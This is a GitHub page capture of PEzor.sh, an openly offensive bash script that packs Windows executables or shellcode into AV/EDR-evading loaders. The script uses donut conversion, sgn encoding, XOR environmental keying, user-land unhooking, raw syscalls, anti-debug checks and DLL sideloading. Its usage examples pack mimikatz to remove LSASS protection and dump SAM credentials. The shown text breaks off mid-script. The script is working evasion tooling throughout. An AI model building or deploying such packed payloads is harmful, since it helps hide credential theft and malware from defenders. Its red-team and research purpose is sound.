-
Notifications
You must be signed in to change notification settings - Fork 322
/
PEzor.sh
executable file
·646 lines (590 loc) · 27.5 KB
/
PEzor.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
#!/usr/bin/env bash
VERSION="3.3.0"
cowsay -f dragon 'PEzor!! v'$VERSION 2>/dev/null || echo 'PEzor!! v'$VERSION
echo '---------------------------------------------------------------------------'
echo 'Read the blog posts here:'
echo 'https://iwantmore.pizza/posts/PEzor.html'
echo 'https://iwantmore.pizza/posts/PEzor2.html'
echo 'https://iwantmore.pizza/posts/PEzor3.html'
echo 'https://iwantmore.pizza/posts/PEzor4.html'
echo 'Based on:'
echo 'https://github.com/TheWover/donut'
echo 'https://github.com/EgeBalci/sgn'
echo 'https://github.com/JustasMasiulis/inline_syscall'
echo 'https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher'
echo '---------------------------------------------------------------------------'
CURRENT_DIR=`pwd`
INSTALL_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
TMP_DIR=`mktemp -d`
SGN=false
BLOB=false
OUTPUT_DIR=false
IS_SHELLCODE=false
BITS=64
FORCED_BITS=false
SLEEP=0
DEBUG=false
SYSCALLS=false
UNHOOK=false
ANTIDEBUG=false
TEXT=false
SELF=false
RX=false
SDK=4.5
CC=x86_64-w64-mingw32-clang
CXX=x86_64-w64-mingw32-clang++
LD=x86_64-w64-mingw32-ld
OUTPUT_FORMAT=exe
OUTPUT_EXTENSION=exe
CLEANUP=false
SOURCES=""
FLUCTUATE=false
XOR_KEY=false
DLL_SIDELOAD=false
ORIGINAL_DLL=false
NEW_DLL_NAME=false
usage() {
echo 'Usage PE: ./PEzor.sh [-32|-64] [-debug] [-syscalls] [-unhook] [-sleep=<SECONDS>] [-sgn] [-antidebug] [-text] [-self] [-rx] [-format=<FORMAT>] <executable.exe> [donut args]'
echo 'Usage Shellcode: ./PEzor.sh [-32|-64] [-debug] [-syscalls] [-unhook] [-sleep=<SECONDS>] [-sgn] [-antidebug] [-text] [-self] [-rx] [-format=<FORMAT>] <shellcode.bin>'
echo ''
echo "USAGE
# PEzor [options...] <EXECUTABLE> [donut args...]
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10+ only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-cleanup Perform the cleanup of allocated payload and loaded modules (only for BOFs)
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
-fluctuate=PROTECTION Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
-xorkey=KEY Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)
-dll-sideload=DLL Generate a DLL that will proxy the execution to another library
[donut args...] After the executable to pack, you can pass additional Donut args, such as -z 2
EXAMPLES
# 64-bit (self-inject RWX)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (fluctuate to READWRITE when sleeping)
$ PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'
# 64-bit (fluctuate to NOACCESS when sleeping)
$ PEzor.sh -fluctuate=NA -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'
# 64-bit (use environmental keying with GetComputerNameExA)
$ PEzor.sh -xorkey=MY-FQDN-MACHINE-NAME -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'
# 64-bit (support EXEs with resource by keeping PE headers in memory)
$ PEzor.sh -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -k 2 -p '\"!+\" \"!processprotect\" \"/process:lsass.exe\" \"/remove\" \"!-\" \"exit\"'
# 64-bit (beacon object file)
$ PEzor.sh -format=bof mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (beacon object file w/ cleanup)
$ PEzor.sh -format=bof -cleanup mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (dll)
$ PEzor.sh -format=dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (dll sideload)
$ PEzor.sh -format=dll -dll-sideload=version.dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (service exe)
$ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (service dll)
$ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (dotnet)
$ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
# 32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread) and arguments for donut
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 \"-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv\"
# PEzor <-32|-64> [options...] <SHELLCODE>
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-shellcode Force shellcode detection
-syscalls Use raw syscalls [64-bit only] [Windows 10+ only]
-sgn Encode the provided shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread [requires RX shellcode, not compatible with -sgn]
-cleanup Perform the cleanup of allocated payload and loaded modules (only for BOFs)
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
-fluctuate=PROTECTION Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
-xorkey=KEY Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)
-dll-sideload=DLL Generate a DLL that will proxy the execution to another library
EXAMPLES
# 64-bit (self-inject RWX)
$ PEzor.sh shellcode.bin
# 64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 shellcode.bin
# 64-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
# 64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 shellcode.bin
# 64-bit (fluctuate to READWRITE when sleeping)
$ PEzor.sh -fluctuate=RW shellcode.bin
# 64-bit (fluctuate to NOACCESS when sleeping)
$ PEzor.sh -fluctuate=NA shellcode.bin
# 64-bit (use environmental keying with GetComputerNameExA)
$ PEzor.sh -xorkey=MY-FQDN-MACHINE-NAME shellcode.bin
# 64-bit (beacon object file)
$ PEzor.sh -format=bof shellcode.bin
# 64-bit (beacon object file w/ cleanup)
$ PEzor.sh -format=bof -cleanup shellcode.bin
# 64-bit (dll)
$ PEzor.sh -format=dll shellcode.bin
# 64-bit (dll sideload)
$ PEzor.sh -format=dll -dll-sideload=version.dll shellcode.bin
# 64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll shellcode.bin
# 64-bit (service exe)
$ PEzor.sh -format=service-exe shellcode.bin
# 64-bit (service dll)
$ PEzor.sh -format=service-dll shellcode.bin
# 64-bit (dotnet)
$ PEzor.sh -format=dotnet shellcode.bin
# 64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke shellcode.bin
# 64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection shellcode.bin
# 32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 shellcode.bin"
}
if [ $# -eq 0 ]; then
usage
exit 1
fi
command -v $CXX >/dev/null 2>&1 || { echo >&2 "$CXX is missing from \$PATH. Check https://github.com/tpoechtrager/wclang to learn how to install it"; exit 1; }
command -v $CC >/dev/null 2>&1 || { echo >&2 "$CC is missing from \$PATH. Check https://github.com/tpoechtrager/wclang to learn how to install it"; exit 1; }
command -v donut >/dev/null 2>&1 || { echo >&2 "donut is missing from \$PATH. Check https://github.com/TheWover/donut to learn how to install it"; exit 1; }
command -v sgn >/dev/null 2>&1 || { echo >&2 "sgn is missing from \$PATH. Check https://github.com/EgeBalci/sgn to learn how to install it"; exit 1; }
command -v mcs >/dev/null 2>&1 || { echo >&2 "mcs is missing from \$PATH. Re-run install.sh script"; exit 1; }
command -v xortool-xor >/dev/null 2>&1 || { echo >&2 "xortool-xor is missing from \$PATH. Re-run install.sh script"; exit 1; }
for arg in "$@"
do
shift
case "$arg" in
-h|help)
usage
exit 0
;;
-debug)
DEBUG=true
echo "[?] Debug build enabled"
;;
-32)
BITS=32
FORCED_BITS=true
echo "[?] Forcing 32-bit architecture"
;;
-64)
BITS=64
FORCED_BITS=true
echo "[?] Forcing 64-bit architecture"
;;
-text)
TEXT=true
echo "[?] Payload will be put in .text section"
;;
-self)
SELF=true
echo "[?] Self-executing payload"
;;
-antidebug)
ANTIDEBUG=true
echo "[?] Anti-debug enabled"
;;
-syscalls)
SYSCALLS=true
echo "[?] Syscalls enabled"
;;
-unhook)
UNHOOK=true
echo "[?] Unhook enabled"
;;
-shellcode)
IS_SHELLCODE=true
echo "[?] Forcing shellcode detection"
;;
-cleanup)
CLEANUP=true
echo "[?] Forcing shellcode detection"
;;
-sleep=*)
SLEEP="${arg#*=}"
echo "[?] Waiting $SLEEP seconds before executing the payload"
;;
-sgn)
echo '[?] Final shellcode will be encoded with sgn'
SGN=true
;;
-rx)
echo '[?] Allocating RX memory for execution'
echo "[*] Warning: -rx supports RX shellcode only"
RX=true
;;
-format=*)
OUTPUT_FORMAT="${arg#*=}"
echo "[?] Output format: $OUTPUT_FORMAT"
;;
-sdk=*)
SDK="${arg#*=}"
echo "[?] .NET SDK: $SDK"
;;
-fluctuate=*)
FLUCTUATE="${arg#*=}"
echo "[?] Fluctuate: $FLUCTUATE"
;;
-xorkey=*)
XOR_KEY="${arg#*=}"
echo "[?] XOR key: $XOR_KEY"
;;
-dll-sideload=*)
DLL_SIDELOAD="${arg#*=}"
echo "[?] DLL to sideload: $DLL_SIDELOAD"
;;
*)
echo "[?] Processing $arg"
ls $arg 1>/dev/null 2>&1 || { echo "[x] ERROR: $arg doesn't exist"; exit 1; }
BLOB=$arg
OUTPUT_DIR=$(dirname -- $BLOB)
break
;;
esac
done
if [ $IS_SHELLCODE = false ]; then
file $BLOB | grep -q ': data' && { IS_SHELLCODE=true; }
file $BLOB | grep -q ': DOS executable (COM)' && { IS_SHELLCODE=true; } # false positive
fi
if [ $FORCED_BITS = false ]; then
file $BLOB | grep -vq 'x86-64' && file $BLOB | grep -q 'PE32' && { BITS=32; }
fi
if [ $BITS -eq 32 ] && [ $SYSCALLS = true ]; then
echo '[x] Error: cannot inline syscalls with 32bits applications'
exit 1
fi
if [[ $OUTPUT_FORMAT == dotnet* ]] && [ $SYSCALLS = true ]; then
echo '[x] Error: cannot inline syscalls when targeting .NET'
exit 1
fi
if [[ $OUTPUT_FORMAT == bof ]] && [ $UNHOOK = true ]; then
echo '[x] Error: cannot unhook when targeting BOFs'
exit 1
fi
if [[ $OUTPUT_FORMAT == bof ]] && [ $SELF = true ]; then
echo '[x] Error: cannot self-execute when targeting BOFs'
exit 1
fi
if [ $RX = true ] && [ $SGN = true ]; then
echo '[x] Error: cannot encode the shellcode when self-executing the payload'
exit 1
fi
if [ $SELF = true ] && [ $OUTPUT_FORMAT == "dll" -o $OUTPUT_FORMAT == "service-dll" -o $OUTPUT_FORMAT == "reflective-dll"]; then
echo '[x] Error: cannot self-execute the payload when targeting DLLs'
exit 1
fi
if [ $IS_SHELLCODE = true ]; then
echo '[?] Shellcode detected'
IS_SHELLCODE=true
else
echo -n '[?] PE detected: '
file $BLOB
fi
rm -f $TMP_DIR/{shellcode,sleep}.cpp{,donut} $TMP_DIR/{ApiSetMap,loader}.o $TMP_DIR/Global.cs
case $OUTPUT_FORMAT in
exe)
echo '[?] Building executable'
OUTPUT_EXTENSION=exe
;;
dll)
echo '[?] Building shared library'
OUTPUT_EXTENSION=dll
;;
reflective-dll)
echo '[?] Building reflective shared library'
OUTPUT_EXTENSION=reflective.dll
;;
service-exe)
echo '[?] Building service executable'
OUTPUT_EXTENSION=service.exe
;;
service-dll)
echo '[?] Building service shared library'
OUTPUT_EXTENSION=service.dll
;;
dotnet*)
echo '[?] Building .NET executable'
OUTPUT_EXTENSION=dotnet.exe
;;
bof)
echo '[?] Building Beacon Object File (BOF)'
if [ $BITS -eq 32 ]; then
OUTPUT_EXTENSION=x86.o
else
OUTPUT_EXTENSION=x64.o
fi
;;
esac
case $OUTPUT_FORMAT in
exe | dll | reflective-dll | service-exe | service-dll | bof)
echo "unsigned int sleep_time = $SLEEP;" > $TMP_DIR/sleep.cpp
if [ $IS_SHELLCODE = false ] && [ $SGN = false ]; then
echo '[?] Executing donut' &&
(donut -i $BLOB -o $TMP_DIR/shellcode.bin.donut "$@" && ls $TMP_DIR/shellcode.bin.donut 1>/dev/null 2>&1) &&
echo '#pragma clang diagnostic ignored "-Woverlength-strings"' >> $TMP_DIR/shellcode.cpp &&
if [ $TEXT = true ]; then echo '__attribute__((section (".text")))' >> $TMP_DIR/shellcode.cpp; fi &&
echo -n 'unsigned char buf[] = "' >> $TMP_DIR/shellcode.cpp &&
if [ $XOR_KEY != false ]; then
xortool-xor -r $XOR_KEY -n -f $TMP_DIR/shellcode.bin.donut > $TMP_DIR/shellcode.bin.donut.xor
else
cp $TMP_DIR/shellcode.bin.donut $TMP_DIR/shellcode.bin.donut.xor
fi &&
od -vtx1 $TMP_DIR/shellcode.bin.donut.xor | sed -e 's/^[0-9]* //' -e '$d' -e 's/^/ /' -e 's/ /\\x/g' | tr -d '\n' >> $TMP_DIR/shellcode.cpp &&
echo '";' >> $TMP_DIR/shellcode.cpp &&
echo 'unsigned int buf_size = sizeof(buf);' >> $TMP_DIR/shellcode.cpp || exit 1
else
if [ $IS_SHELLCODE = false ]; then
echo '[?] Executing donut' &&
(donut -i $BLOB -o $TMP_DIR/shellcode.bin.donut "$@" && ls $TMP_DIR/shellcode.bin.donut 1>/dev/null 2>&1)
else
cp $BLOB $TMP_DIR/shellcode.bin.donut
fi &&
if [ $SGN = true ]; then
echo '[?] Executing sgn' &&
(sgn -a $BITS -c 1 -o $TMP_DIR/shellcode.bin $TMP_DIR/shellcode.bin.donut || exit 1)
else
cp $TMP_DIR/shellcode.bin.donut $TMP_DIR/shellcode.bin
fi &&
if [ $XOR_KEY != false ]; then
xortool-xor -r $XOR_KEY -n -f $TMP_DIR/shellcode.bin > $TMP_DIR/shellcode.bin.xor
else
cp $TMP_DIR/shellcode.bin $TMP_DIR/shellcode.bin.xor
fi &&
echo '#pragma clang diagnostic ignored "-Woverlength-strings"' >> $TMP_DIR/shellcode.cpp &&
if [ $TEXT = true ]; then echo '__attribute__((section (".text")))' >> $TMP_DIR/shellcode.cpp; fi &&
echo -n 'unsigned char buf[] = "' >> $TMP_DIR/shellcode.cpp &&
od -vtx1 $TMP_DIR/shellcode.bin.xor | sed -e 's/^[0-9]* //' -e '$d' -e 's/^/ /' -e 's/ /\\x/g' | tr -d '\n' >> $TMP_DIR/shellcode.cpp &&
echo '";' >> $TMP_DIR/shellcode.cpp &&
echo 'unsigned int buf_size = sizeof(buf);' >> $TMP_DIR/shellcode.cpp || exit 1
fi &&
if [[ ( $OUTPUT_FORMAT = "exe" || $OUTPUT_FORMAT = "service-exe" ) && $DEBUG = false ]]; then
CCFLAGS="-O3 -Wl,-strip-all,-subsystem=windows -Wall -pedantic"
CPPFLAGS="-O3 -Wl,-strip-all,-subsystem=windows -Wall -pedantic"
else
CCFLAGS="-O3 -Wl,-strip-all, -Wall -pedantic"
CPPFLAGS="-O3 -Wl,-strip-all, -Wall -pedantic"
fi &&
if [ $BITS -eq 32 ]; then
CC=i686-w64-mingw32-clang
CXX=i686-w64-mingw32-clang++
CCFLAGS="$CCFLAGS -m32 -DWIN_X86"
CPPFLAGS="$CPPFLAGS -m32 -DWIN_X86"
else
CCFLAGS="$CCFLAGS -D_WIN64 -DWIN_X64"
CPPFLAGS="$CPPFLAGS -D_WINX64 -DWIN_X64"
fi &&
if [ $DEBUG = true ]; then
CCFLAGS="$CCFLAGS -D_DEBUG_"
CPPFLAGS="$CPPFLAGS -D_DEBUG_"
fi &&
if [ $SYSCALLS = true ]; then
CCFLAGS="$CCFLAGS -DSYSCALLS"
CPPFLAGS="$CPPFLAGS -DSYSCALLS"
fi &&
if [ $UNHOOK = true ]; then
CCFLAGS="$CCFLAGS -DUNHOOK"
CPPFLAGS="$CPPFLAGS -DUNHOOK"
fi &&
if [ $ANTIDEBUG = true ]; then
CCFLAGS="$CCFLAGS -DANTIDEBUG"
CPPFLAGS="$CPPFLAGS -DANTIDEBUG"
fi &&
if [ $SELF = true ]; then
CCFLAGS="$CCFLAGS -DSELFINJECT"
CPPFLAGS="$CPPFLAGS -DSELFINJECT"
fi &&
if [ $RX = true ]; then
CCFLAGS="$CCFLAGS -DRX"
CPPFLAGS="$CPPFLAGS -DRX"
fi &&
if [ $TEXT = true ]; then
CCFLAGS="$CCFLAGS -D_TEXT_"
CPPFLAGS="$CPPFLAGS -D_TEXT_"
fi &&
if [ $CLEANUP = true ]; then
CCFLAGS="$CCFLAGS -D_CLEANUP_"
CPPFLAGS="$CPPFLAGS -D_CLEANUP_"
fi &&
if [ $FLUCTUATE = "rw" ] || [ $FLUCTUATE = "RW" ]; then
CCFLAGS="$CCFLAGS -DFLUCTUATE -DFLUCTUATE_RW"
CPPFLAGS="$CPPFLAGS -DFLUCTUATE -DFLUCTUATE_RW"
elif [ $FLUCTUATE = "na" ] || [ $FLUCTUATE = "NA" ]; then
CCFLAGS="$CCFLAGS -DFLUCTUATE -DFLUCTUATE_NA"
CPPFLAGS="$CPPFLAGS -DFLUCTUATE -DFLUCTUATE_NA"
fi &&
if [ $XOR_KEY != false ]; then
CCFLAGS="$CCFLAGS -DXOR_KEY=\"$XOR_KEY\""
CPPFLAGS="$CPPFLAGS -DXOR_KEY=\"$XOR_KEY\""
fi &&
if [ $OUTPUT_FORMAT = "dll" ]; then
CCFLAGS="$CCFLAGS -shared -DSHAREDOBJECT"
CPPFLAGS="$CPPFLAGS -shared -DSHAREDOBJECT"
elif [ $OUTPUT_FORMAT = "reflective-dll" ]; then
CCFLAGS="$CCFLAGS -shared -DSHAREDOBJECT -DREFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
CPPFLAGS="$CPPFLAGS -shared -DSHAREDOBJECT -DREFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
elif [ $OUTPUT_FORMAT = "service-exe" ]; then
CCFLAGS="$CCFLAGS -DSERVICE_EXE"
CPPFLAGS="$CPPFLAGS -DSERVICE_EXE"
elif [ $OUTPUT_FORMAT = "service-dll" ]; then
CCFLAGS="$CCFLAGS -shared -DSHAREDOBJECT -DSERVICE_EXE -DSERVICE_DLL"
CPPFLAGS="$CPPFLAGS -shared -DSHAREDOBJECT -DSERVICE_EXE -DSERVICE_DLL"
elif [ $OUTPUT_FORMAT = "bof" ]; then
CCFLAGS="$CCFLAGS -c -D_BOF_"
CPPFLAGS="$CPPFLAGS -c -D_BOF_"
fi &&
if [ $OUTPUT_FORMAT = "reflective-dll" ]; then
$CC $CCFLAGS -c $INSTALL_DIR/ReflectiveDLLInjection/dll/src/ReflectiveLoader.c -o $TMP_DIR/ReflectiveLoader.o
SOURCES="$SOURCES $TMP_DIR/ReflectiveLoader.o"
fi &&
if [ $UNHOOK = true ] || [ $ANTIDEBUG = true ]; then
$CC $CCFLAGS -c $INSTALL_DIR/ApiSetMap.c -o $TMP_DIR/ApiSetMap.o &&
SOURCES="$SOURCES $TMP_DIR/ApiSetMap.o"
fi &&
if [ $UNHOOK = true ]; then
$CC $CCFLAGS -c $INSTALL_DIR/loader.c -o $TMP_DIR/loader.o &&
SOURCES="$SOURCES $TMP_DIR/loader.o"
fi &&
if [ $FLUCTUATE = "rw" ] || [ $FLUCTUATE = "RW" ] || [ $FLUCTUATE = "na" ] || [ $FLUCTUATE = "NA" ]; then
SOURCES="$SOURCES $INSTALL_DIR/fluctuate.cpp"
fi &&
if [ $OUTPUT_FORMAT = "dll" -o $OUTPUT_FORMAT = "service-dll" -o $OUTPUT_FORMAT == "reflective-dll" ] && [ $DLL_SIDELOAD != false ]; then
SOURCES="$SOURCES $TMP_DIR/sideload.def"
ORIGINAL_DLL=$(basename -- "$DLL_SIDELOAD")
original_dll_name="${ORIGINAL_DLL%.*}"
new_dll="$original_dll_name""$RANDOM"
NEW_DLL_NAME="$new_dll.dll"
winedump dump -C -j export "$DLL_SIDELOAD" | \
awk '
BEGIN {
print "EXPORTS"
}
/Entry/,/Done/ {
if ($2 ~ /^[0-9]+/) {
ordinal = $2
name = $3
new_dll = "'${new_dll}'"
if (name ~ /</) {
# Exported by ordinal (TODO: syntax error in .def file)
# printf " @%s=%s.#%s @%s\n", ordinal, new_dll, ordinal, ordinal
} else if (name !~ /DllMain/){
# Exported function with a name
printf " %s=%s.%s @%s\n", name, new_dll, name, ordinal
}
}
}
' > $TMP_DIR/sideload.def || exit 1
fi &&
if [ $OUTPUT_FORMAT = "bof" ]; then
# $CXX $CPPFLAGS $CXXFLAGS -Wl,--disable-auto-import -Wl,--disable-runtime-pseudo-reloc $TMP_DIR/shellcode.cpp -c -o $TMP_DIR/shellcode.o
# $CXX $CPPFLAGS $CXXFLAGS $TMP_DIR/sleep.cpp -c -o $TMP_DIR/sleep.o &&
# $CXX $CPPFLAGS $CXXFLAGS $INSTALL_DIR/inject.cpp -c -o $TMP_DIR/inject.o &&
CXXFLAGS="-std=c++17 -static"
grep -v '#include "inject.hpp"' $INSTALL_DIR/inject.cpp > $TMP_DIR/inject.cpp &&
cat $TMP_DIR/{shellcode,sleep}.cpp $INSTALL_DIR/bof.cpp $TMP_DIR/inject.cpp > $TMP_DIR/bof.cpp &&
cp $INSTALL_DIR/{sleep,inject,syscalls}.hpp $INSTALL_DIR/beacon.h $TMP_DIR &&
mkdir -p $TMP_DIR/deps/inline_syscall/include &&
cp $INSTALL_DIR/deps/inline_syscall/include/* $TMP_DIR/deps/inline_syscall/include &&
$CXX -mno-stack-arg-probe $CPPFLAGS $CXXFLAGS $TMP_DIR/bof.cpp -c -o $BLOB.packed.$OUTPUT_EXTENSION || exit 1
# x86_64-w64-mingw32-ld -r $TMP_DIR/{sleep,bof,inject}.o -o $BLOB.packed.$OUTPUT_EXTENSION
else
CXXFLAGS="-std=c++17 -static"
echo $CXX $CPPFLAGS $CXXFLAGS $INSTALL_DIR/{inject,PEzor}.cpp $TMP_DIR/{shellcode,sleep}.cpp $SOURCES -o $BLOB.packed.$OUTPUT_EXTENSION &&
$CXX $CPPFLAGS $CXXFLAGS $INSTALL_DIR/{inject,PEzor}.cpp $TMP_DIR/{shellcode,sleep}.cpp $SOURCES -o $BLOB.packed.$OUTPUT_EXTENSION &&
strip $BLOB.packed.$OUTPUT_EXTENSION || exit 1
fi
;;
dotnet*)
DOTNET_FLAGS="-unsafe -debug-"
echo 'public static class Global {' >> $TMP_DIR/Global.cs &&
echo "public static int sleep_time = $SLEEP;" >> $TMP_DIR/Global.cs &&
echo -n 'public static ' >> $TMP_DIR/Global.cs &&
if [ $IS_SHELLCODE = false ] && [ $SGN = false ]; then
echo '[?] Executing donut' &&
(donut -i $BLOB -f 7 -o $TMP_DIR/shellcode.cs "$@" && ls $TMP_DIR/shellcode.cs 1>/dev/null 2>&1) &&
cat $TMP_DIR/shellcode.cs >> $TMP_DIR/Global.cs
else
if [ $IS_SHELLCODE = false ]; then
echo '[?] Executing donut' &&
(donut -i $BLOB -o $TMP_DIR/shellcode.bin.donut "$@" && ls $TMP_DIR/shellcode.bin.donut 1>/dev/null 2>&1)
else
cp $BLOB $TMP_DIR/shellcode.bin.donut
fi &&
if [ $SGN = true ]; then
echo '[?] Executing sgn' &&
(sgn -a $BITS -c 1 -o $TMP_DIR/shellcode.bin $TMP_DIR/shellcode.bin.donut || exit 1)
else
cp $TMP_DIR/shellcode.bin.donut $TMP_DIR/shellcode.bin
fi &&
echo -n 'byte[] my_buf = {' >> $TMP_DIR/Global.cs &&
od -vtx1 $TMP_DIR/shellcode.bin | sed -e 's/^[0-9]* //' -e '$d' -e 's/^/ /' -e 's/ /,0x/g' -e 's/^,//g' | sed -z -e 's/\n/,/g' -e 's/,$//g' >> $TMP_DIR/Global.cs &&
echo -n '};' >> $TMP_DIR/Global.cs
fi &&
echo '}' >> $TMP_DIR/Global.cs &&
if [ ! $SDK = "4.5" ]; then
DOTNET_FLAGS="$DOTNET_FLAGS -sdk:$SDK"
fi &&
if [ $BITS -eq 32 ]; then
DOTNET_FLAGS="$DOTNET_FLAGS -platform:x86"
else
DOTNET_FLAGS="$DOTNET_FLAGS -platform:x64"
fi &&
if [ $DEBUG = true ]; then
